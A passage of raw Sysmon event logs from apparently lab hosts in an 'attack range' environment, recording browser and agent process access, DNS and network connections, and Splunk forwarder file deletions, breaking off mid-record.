10341000x800000000000000042022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.266{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000042020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a 10341000x800000000000000042019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000042016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a 23542300x800000000000000016533Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:19.925{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FCB78437245848DF1E035E380A81FA7,SHA256=1A7F00B2F7287E2BF109BC8B255CAFF503135D057FE303AA2ED67AF4E7DC4335,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000042034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.858{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58422- 354300x800000000000000042033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.824{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56305-false72.21.91.29-80http 354300x800000000000000042032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.772{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56303-false23.194.157.13a23-194-157-13.deploy.static.akamaitechnologies.com443https 354300x800000000000000042031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.772{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56304-false23.194.157.13a23-194-157-13.deploy.static.akamaitechnologies.com443https 354300x800000000000000042030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.759{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63880- 23542300x800000000000000042029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:19.817{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=083BB9288B6E3761744E30EAEC7CD973,SHA256=A4CD6D0874F1582A11258E13842D25CB8656A3E5F5FCE70D963AB644DD9C0E62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000042038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.647{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56308-false10.0.1.12-8000- 354300x800000000000000042037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.872{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56306-false204.79.197.200a-0001.a-msedge.net443https 354300x800000000000000042036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.871{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56307-false204.79.197.200a-0001.a-msedge.net443https 23542300x800000000000000042035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:20.911{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0109321C333C0EC0D6CA66CA859E2A25,SHA256=2631EB49C761E0344A19F44583FADE1E7C335B5A18FFCB5BAA7D62C96587FAF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016535Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:19.098{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50100-false169.254.169.254instance-data.us-east-2.compute.internal80http 23542300x800000000000000016534Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:21.009{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12333256ADED1430612000DD3DD9ADDB,SHA256=A7FE5B50DB8F11B1C4C6B24EF211449C8B350FF35E099D1E7EBB73F863A99DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:22.004{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192486DB53570021A161FC075F7CE06C,SHA256=8C41830A49E28BE463DF24C32708D8392C2B2F9809793A4F1B4063FD6C965AEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016568Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:21.001{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50101-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000016567Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016566Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.746{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016565Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016564Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016563Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.739{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016562Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016561Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016560Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016559Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016558Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.717{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016557Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.716{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016556Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.708{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016555Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 